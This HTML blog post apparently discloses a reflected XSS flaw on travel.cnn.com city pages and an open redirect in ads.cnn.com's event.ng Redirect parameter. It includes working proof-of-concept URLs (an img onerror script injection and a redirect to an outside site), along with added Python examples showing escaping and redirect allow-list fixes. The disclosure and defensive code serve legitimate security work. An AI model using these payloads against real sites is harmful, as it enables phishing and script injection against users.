<div style="-webkit-text-stroke-width: 0px; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
</div>
<div style="-webkit-text-stroke-width: 0px; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;">The programming flaw occurs on the "/city/<wbr></wbr>all" pages. All links under this URL are vulnerable to XSS attacks, e.g.</span></div>
</div>
<div style="-webkit-text-stroke-width: 0px; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<div style="margin: 0px;">
<a href="http://travel.cnn.com/city/all/all/washington?page=0%2C1" target="_blank"><span style="color: black; font-family: Arial, Helvetica, sans-serif;">http://travel.cnn.com/city/<wbr></wbr>all/all/washington?page=0%2C1</span></a></div>
</div>
<div style="-webkit-text-stroke-width: 0px; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<div style="margin: 0px;">
<a href="http://travel.cnn.com/city/all/all/tokyo/all?page=0%2C1" target="_blank"><span style="color: black; font-family: Arial, Helvetica, sans-serif;">http://travel.cnn.com/city/<wbr></wbr>all/all/tokyo/all?page=0%2C1</span></a></div>
</div>
<div style="-webkit-text-stroke-width: 0px; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
</div>
<div style="-webkit-text-stroke-width: 0px; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
</div>
<div style="-webkit-text-stroke-width: 0px; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span><span style="font-family: Arial, Helvetica, sans-serif;"><br /></span><span style="font-family: Arial, Helvetica, sans-serif;">XSS may allow a remote attacker to create a specially crafted request that would execute arbitrary script code in a user's browser session within the trust relationship between their browser and the server. Based on Acunetix, exploited XSS is commonly used to achieve the following malicious results:</span></div>
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
<ul>
<li><span style="font-family: Arial, Helvetica, sans-serif;">Identity theft</span></li>
<li><span style="font-family: Arial, Helvetica, sans-serif;">Accessing sensitive or restricted information</span></li>
<li><span style="font-family: Arial, Helvetica, sans-serif;">Gaining free access to otherwise paid for content</span></li>
<li><span style="font-family: Arial, Helvetica, sans-serif;">Spying on user’s web browsing habits</span></li>
<li><span style="font-family: Arial, Helvetica, sans-serif;">Altering browser functionality</span></li>
<li><span style="font-family: Arial, Helvetica, sans-serif;">Public defamation of an individual or corporation</span></li>
<li><span style="font-family: Arial, Helvetica, sans-serif;">Web application defacement</span></li>
<li><span style="font-family: Arial, Helvetica, sans-serif;">Denial of Service attacks</span></li>
</ul>
<div>
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
</div>
<div>
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
</div>
<div>
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;">The programming flaw can be exploited without user login. Tests were performed on Firefox (34.0) in Ubuntu (14.04) and IE (9.0.15) in Windows 7.</span></div>
</div>
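The bug class here is a page that reflects its own request path into an HTML attribute (a canonical link, a pager link) without escaping, so a path ending in a quote and a closing bracket breaks out of the attribute. The block below is an added example, not code from the original advisory or from CNN, that models the defect and its fix in a few lines: `render_unsafe` concatenates the raw path, `render_safe` first rejects any path that does not match the expected `/city/...` shape and then HTML-escapes it for the attribute context, and `reflects_markup` is the check a scanner or a unit test would apply. The template, the hostname and the function names are assumptions; the probe is constructed in the same attribute-breakout shape as the advisory's PoC.

```python
import html
import re

# Expected shape of these pages: /city/all/all/tokyo/all, /city/all/all/washington
CITY_PATH_RE = re.compile(r"^/city(?:/[a-z0-9_-]+)+/?$")


def escape_for_attribute(value: str) -> str:
    """Escape text for use inside a quoted HTML attribute (& < > " ')."""
    return html.escape(value, quote=True)


def render_unsafe(request_path: str) -> str:
    """The vulnerable pattern: the request path is dropped into attributes raw."""
    return (
        '<link rel="canonical" href="http://travel.example.com' + request_path + '">\n'
        '<a class="pager-next" href="' + request_path + '?page=0%2C1">next</a>'
    )


def render_safe(request_path: str) -> str:
    """Hardened: validate the path shape first, then escape for the attribute."""
    if not CITY_PATH_RE.match(request_path):
        # Unexpected shape: do not reflect it at all, use a fixed fallback.
        request_path = "/city/all"
    safe = escape_for_attribute(request_path)
    return (
        '<link rel="canonical" href="http://travel.example.com' + safe + '">\n'
        '<a class="pager-next" href="' + safe + '?page=0%2C1">next</a>'
    )


def reflects_markup(rendered: str, probe: str) -> bool:
    """Detection check: does the probe's raw tag survive into the HTML output?"""
    return probe in rendered


# Constructed probe: the same attribute-breakout shape as the advisory's PoC.
PROBE_PATH = "/city/all/all/tokyo/all' /\"><img src=x onerror=prompt(1)>"

if __name__ == "__main__":
    print("unsafe reflects tag:", reflects_markup(render_unsafe(PROBE_PATH), "<img src=x"))
    print("safe reflects tag:  ", reflects_markup(render_safe(PROBE_PATH), "<img src=x"))
```

Validation and escaping are both applied on purpose: the allowlist regex stops the page from echoing arbitrary input, and the attribute escaping guards the template even if a later change loosens the regex. Note that escaping is context specific; `html.escape` is right for a quoted attribute or element text, but a value placed inside a `<script>` block or an unquoted attribute needs different handling.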
<div>
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
</div>
<div>
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
</div>
<div>
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
</div>
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi2P2lj15KOys4BpNXJtXYgJPh4-omrlhHmpzRuDrdu0txHBJnYcti7wbKWFVj-NNbVeRE4_3qeMWQCCrrl83IUVavQRng1eo5tYnIcRMQtqdAIYHPF9OyHk50eaNq8nXe-MDSd6cAAJTc/s1600/cnn_travel_city_xss1.png" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><span style="color: black; font-family: Arial, Helvetica, sans-serif;"><img border="0" height="253" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi2P2lj15KOys4BpNXJtXYgJPh4-omrlhHmpzRuDrdu0txHBJnYcti7wbKWFVj-NNbVeRE4_3qeMWQCCrrl83IUVavQRng1eo5tYnIcRMQtqdAIYHPF9OyHk50eaNq8nXe-MDSd6cAAJTc/s400/cnn_travel_city_xss1.png" style="cursor: move;" width="400" /></span></a></div>
</div>
<div style="-webkit-text-stroke-width: 0px; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
</div>
<div style="-webkit-text-stroke-width: 0px; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span><span style="font-family: Arial, Helvetica, sans-serif;"><br /></span><span style="font-family: Arial, Helvetica, sans-serif;"><br /></span><span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
</div>
<div style="-webkit-text-stroke-width: 0px; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<div style="margin: 0px;">
<b><span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></b><b><span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></b><b><span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></b><b><span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></b><b><span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></b><b><span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></b><b><span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></b><b><span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></b><b><span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></b><b><span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></b><b><span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></b><b><span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></b><b><span style="font-family: Arial, Helvetica, sans-serif;">PoC:</span></b></div>
</div>
<div style="-webkit-text-stroke-width: 0px; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;"><a href="http://travel.cnn.com/city/all/all/tokyo/all" target="_blank">http://travel.cnn.com/city/<wbr></wbr>all/all/tokyo/all</a>' /"><img src=x onerror=prompt(/justqdjing/)></span></div>
</div>
<div style="-webkit-text-stroke-width: 0px; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;"><a href="http://travel.cnn.com/city/all/all/bangkok/all" target="_blank">http://travel.cnn.com/city/<wbr></wbr>all/all/bangkok/all</a>' /"><img src=x onerror=prompt(/justqdjing/)></span></div>
</div>
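An added example, not code from the original post, showing the output encoding that neutralises the payload form used in the PoC above. It assumes the vulnerable page reflects its own request path into an href attribute (the post does not name the exact sink); the link text, base URL and payload path are constructed for illustration.

```python
import html
from urllib.parse import quote

# Constructed request path modelled on the PoC above: the path is closed with
# a quote and an <img onerror> handler is appended.
PAYLOAD_PATH = "/city/all/all/tokyo/all' /\"><img src=x onerror=prompt(/justqdjing/)>"
BASE = "http://travel.cnn.com"  # assumed origin of the reflecting page


def vulnerable_self_link(request_path: str) -> str:
    """'Before': the raw request path is concatenated into an href attribute,
    so a quote in the path terminates the attribute and the rest is markup."""
    return '<a href="' + BASE + request_path + '">Tokyo</a>'


def safe_self_link(request_path: str) -> str:
    """'After': encode for both contexts the value passes through.
    1. percent-encode for the URL context: quote() turns ' " < > ( ) = and
       space into %XX, leaving only '/' and unreserved characters;
    2. HTML-encode for the attribute context, which keeps the attribute from
       being closed early even if step 1 is ever relaxed."""
    url_safe = quote(request_path, safe="/")
    return '<a href="' + html.escape(BASE + url_safe, quote=True) + '">Tokyo</a>'


def attribute_is_intact(markup: str) -> bool:
    """Sanity check for a rendered link: exactly one href attribute (two quote
    characters in total) whose value contains none of the characters the PoC
    relies on to break out of the attribute."""
    start = markup.find('href="') + len('href="')
    end = markup.find('"', start)
    value = markup[start:end]
    return markup.count('"') == 2 and not any(c in value for c in "<>'")


if __name__ == "__main__":
    print(vulnerable_self_link(PAYLOAD_PATH))
    print(safe_self_link(PAYLOAD_PATH))
```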
<div style="-webkit-text-stroke-width: 0px; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<div style="margin: 0px;">
<b><span style="font-family: Arial, Helvetica, sans-serif;">(1.1) <span style="line-height: 21.7777786254883px; text-align: justify;">PoC Video:</span></span></b></div>
</div>
<div style="-webkit-text-stroke-width: 0px; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<div style="color: #333333; font-family: 'Helvetica Neue Light', HelveticaNeue-Light, 'Helvetica Neue', Helvetica, Arial, sans-serif; line-height: 21.7777786254883px; margin: 0px; outline: none; padding: 0px; text-align: justify;">
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;"><a href="https://www.youtube.com/watch?v=Cu47XiDV38M&feature=youtu.be" style="-webkit-transition: color 0.3s; color: #009eb8; display: inline; font-family: 'Helvetica Neue Light', HelveticaNeue-Light, 'Helvetica Neue', Helvetica, Arial, sans-serif; outline: none; text-decoration: none; transition: color 0.3s;">https://www.youtube.com/watch?v=Cu47XiDV38M&feature=youtu.be</a></span></div>
</div>
<div style="line-height: 21.7777786254883px; margin: 0px; outline: none; padding: 0px; text-align: justify;">
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
</div>
<div style="color: #333333; font-family: 'Helvetica Neue Light', HelveticaNeue-Light, 'Helvetica Neue', Helvetica, Arial, sans-serif; line-height: 21.7777786254883px; margin: 0px; outline: none; padding: 0px; text-align: justify;">
<div style="margin: 0px; outline: none; padding: 0px;">
<div style="margin: 0px;">
<b><span style="font-family: Arial, Helvetica, sans-serif;">Blog Details:</span></b></div>
</div>
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;"><a href="http://securityrelated.blogspot.sg/2014/12/cnn-cnncom-travel-city-related-links.html" style="-webkit-transition: color 0.3s; color: #009eb8; display: inline; font-family: 'Helvetica Neue Light', HelveticaNeue-Light, 'Helvetica Neue', Helvetica, Arial, sans-serif; outline: none; text-decoration: none; transition: color 0.3s;">http://securityrelated.blogspot.com/2014/12/cnn-cnncom-travel-city-related-links.html</a></span></div>
</div>
</div>
<div style="-webkit-text-stroke-width: 0px; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<div style="margin: 0px;">
<b><span style="font-family: Arial, Helvetica, sans-serif;">(2) CNN cnn.com ADS Open Redirect Web Security Bug</span></b></div>
</div>
<div style="-webkit-text-stroke-width: 0px; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<div style="margin: 0px;">
<b><span style="font-family: Arial, Helvetica, sans-serif;">Domain:</span></b></div>
</div>
<div style="-webkit-text-stroke-width: 0px; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;">ads.cnn.com</span></div>
</div>
<div style="-webkit-text-stroke-width: 0px; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<div style="margin: 0px;">
<b><span style="font-family: Arial, Helvetica, sans-serif;">Vulnerability Description:</span></b></div>
</div>
<div style="-webkit-text-stroke-width: 0px; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
</div>
<div style="-webkit-text-stroke-width: 0px; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;">The flaw is in the "event.ng" page, whose "Redirect" parameter is used as the redirect destination, e.g.</span></div>
</div>
<div style="-webkit-text-stroke-width: 0px; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<div style="margin: 0px;">
<a href="http://ads.cnn.com/event.ng/Type=click&FlightID=92160&AdID=125504&TargetID=1346&RawValues=&Redirect=http:%2f%2fgoogle.com" target="_blank"><span style="color: black; font-family: Arial, Helvetica, sans-serif;">http://ads.cnn.com/event.ng/<wbr></wbr>Type=click&FlightID=92160&<wbr></wbr>AdID=125504&TargetID=1346&<wbr></wbr>RawValues=&Redirect=http:%2f%<wbr></wbr>2fgoogle.com</span></a></div>
</div>
<div style="-webkit-text-stroke-width: 0px; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
</div>
<div style="-webkit-text-stroke-width: 0px; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;">From OWASP: an open redirect is an application that takes a parameter and redirects a user to the parameter value without any validation. This vulnerability is used in phishing attacks to get users to visit malicious sites without realizing it. It allows an attacker to create a specially crafted URL that, if clicked, redirects the victim from the intended, legitimate web site to an arbitrary web site of the attacker's choosing. Such attacks work because the crafted URL initially appears to point at a trusted site, and they can be leveraged to direct an unsuspecting user to a page containing attacks that target client-side software such as a web browser or document rendering programs.</span></div>
<div>
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
</div>
<div>
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
</div>
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;">The vulnerabilities can be exploited without a user login. Tests were performed on Microsoft IE (10.0.9200.16750) on Windows 8, Mozilla Firefox (34.0) and Google Chromium 39.0.2171.65-0 ubuntu0.14.04.1.1064 (64-bit) on Ubuntu 14.04, and Apple Safari 6.1.6 on Mac OS X Lion 10.7.</span></div>
</div>
<div style="-webkit-text-stroke-width: 0px; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;"><b>(2.1) </b>The following test illustrates the scenario described above.</span></div>
</div>
<div style="-webkit-text-stroke-width: 0px; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
</div>
<div style="-webkit-text-stroke-width: 0px; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;">For this test the redirect destination is "<a href="http://webcabinet.tumblr.com/">http://webcabinet.tumblr.com/</a>"; suppose that this page is malicious.</span></div>
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span><span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
</div>
<div style="-webkit-text-stroke-width: 0px; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
</div>
<div style="-webkit-text-stroke-width: 0px; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;">Vulnerable URL:</span></div>
</div>
<div style="-webkit-text-stroke-width: 0px; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<div style="margin: 0px;">
<a href="http://ads.cnn.com/event.ng/Type=click&FlightID=92160&AdID=125504&TargetID=1346&RawValues=&Redirect=http:%2f%2fcnn.com" target="_blank"><span style="color: black; font-family: Arial, Helvetica, sans-serif;">http://ads.cnn.com/event.ng/<wbr></wbr>Type=click&FlightID=92160&<wbr></wbr>AdID=125504&TargetID=1346&<wbr></wbr>RawValues=&Redirect=http:%2f%<wbr></wbr>2fcnn.com</span></a></div>
</div>
<div style="-webkit-text-stroke-width: 0px; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
</div>
<div style="-webkit-text-stroke-width: 0px; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;">POC:</span></div>
</div>
<div style="-webkit-text-stroke-width: 0px; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;"><a href="http://ads.cnn.com/event.ng/Type=click&FlightID=92160&AdID=125504&TargetID=1346&RawValues=&Redirect=http:%2f%2fwebcabinet.tumblr.com" target="_blank">http://ads.cnn.com/event.ng/<wbr></wbr>Type=click&FlightID=92160&<wbr></wbr>AdID=125504&TargetID=1346&<wbr></wbr>RawValues=&Redirect=http:%2f%<wbr></wbr>2fwebcabinet.tumblr.com</a></span></div>
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span><span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
</div>
<div style="-webkit-text-stroke-width: 0px; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<div>
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;"><br class="Apple-interchange-newline" /></span></div>
</div>
<div>
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;">Since CNN is well known worldwide, this vulnerability can be used for "<a href="http://tetraph.com/covert_redirect/">Covert Redirect</a>" attacks against other websites.</span></div>
</div>
<div>
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
</div>
</div>
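An added example, not the ad server's own code, of how an event.ng-style click handler could validate the Redirect value against an allow-list before issuing the redirect, including the percent-encoded form (http:%2f%2f...) the PoC uses. The allow-list, fallback URL and the evil.example placeholder host are constructed for illustration; the click URL is the one quoted above.

```python
from urllib.parse import unquote, urlsplit

# Constructed allow-list for this example: CNN's own domain and its
# subdomains. Any other destination falls back to the site front page.
ALLOWED_HOSTS = {"cnn.com"}
FALLBACK = "http://www.cnn.com/"

# Click URL from the post above: the parameters sit in the path, joined by '&'.
POC_CLICK_URL = ("http://ads.cnn.com/event.ng/Type=click&FlightID=92160&AdID=125504"
                 "&TargetID=1346&RawValues=&Redirect=http:%2f%2fgoogle.com")


def redirect_value_from_event_url(url: str) -> str:
    """Return the raw (still percent-encoded) Redirect= value of an event.ng
    click URL, or '' if there is none."""
    path = urlsplit(url).path
    for pair in path.split("/event.ng/", 1)[-1].split("&"):
        key, _, value = pair.partition("=")
        if key == "Redirect":
            return value
    return ""


def host_allowed(host: str) -> bool:
    """Exact match or subdomain of an allow-listed host. Suffix tricks such as
    cnn.com.evil.example fail because the check requires a dot boundary."""
    host = host.lower().rstrip(".")
    return host in ALLOWED_HOSTS or any(host.endswith("." + h) for h in ALLOWED_HOSTS)


def safe_redirect_target(raw_redirect: str) -> str:
    """Validate the Redirect value and return a URL that is safe to place in a
    Location header. Anything not on the allow-list collapses to FALLBACK."""
    # event.ng receives the value percent-encoded (http:%2f%2f...). Decode it
    # exactly once; decoding repeatedly would let double-encoded values through.
    target = unquote(raw_redirect).strip()
    # Some browsers treat backslashes as slashes; normalise before parsing so
    # the validator sees the same authority the browser will.
    target = target.replace("\\", "/")
    parts = urlsplit(target)
    if parts.scheme.lower() not in ("http", "https"):
        return FALLBACK  # rejects javascript:, data:, and scheme-less //host
    if not parts.hostname or "@" in parts.netloc:
        return FALLBACK  # no authority, or userinfo such as http://cnn.com@evil
    if not host_allowed(parts.hostname):
        return FALLBACK
    return target


if __name__ == "__main__":
    raw = redirect_value_from_event_url(POC_CLICK_URL)
    print(raw, "->", safe_redirect_target(raw))
```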
<div style="-webkit-text-stroke-width: 0px; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;"><b>(2.2) </b><b style="line-height: 21.7777786254883px; text-align: justify;">PoC Video:</b></span></div>
</div>
<div style="-webkit-text-stroke-width: 0px; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<div style="color: #333333; font-family: 'Helvetica Neue Light', HelveticaNeue-Light, 'Helvetica Neue', Helvetica, Arial, sans-serif; font-size: 14.4444446563721px; line-height: 21.7777786254883px; margin: 0px; outline: none; padding: 0px; text-align: justify;">
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;"><a href="https://www.youtube.com/watch?v=FE8lhDvKGN0&feature=youtu.be" style="-webkit-transition: color 0.3s; color: #009eb8; display: inline; font-family: 'Helvetica Neue Light', HelveticaNeue-Light, 'Helvetica Neue', Helvetica, Arial, sans-serif; outline: none; text-decoration: none; transition: color 0.3s;">https://www.youtube.com/watch?v=FE8lhDvKGN0&feature=youtu.be</a></span></div>
</div>
<div style="line-height: 21.7777786254883px; margin: 0px; outline: none; padding: 0px; text-align: justify;">
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
</div>
<div style="color: #333333; font-family: 'Helvetica Neue Light', HelveticaNeue-Light, 'Helvetica Neue', Helvetica, Arial, sans-serif; font-size: 14.4444446563721px; line-height: 21.7777786254883px; margin: 0px; outline: none; padding: 0px; text-align: justify;">
<div style="margin: 0px; outline: none; padding: 0px;">
<div style="margin: 0px;">
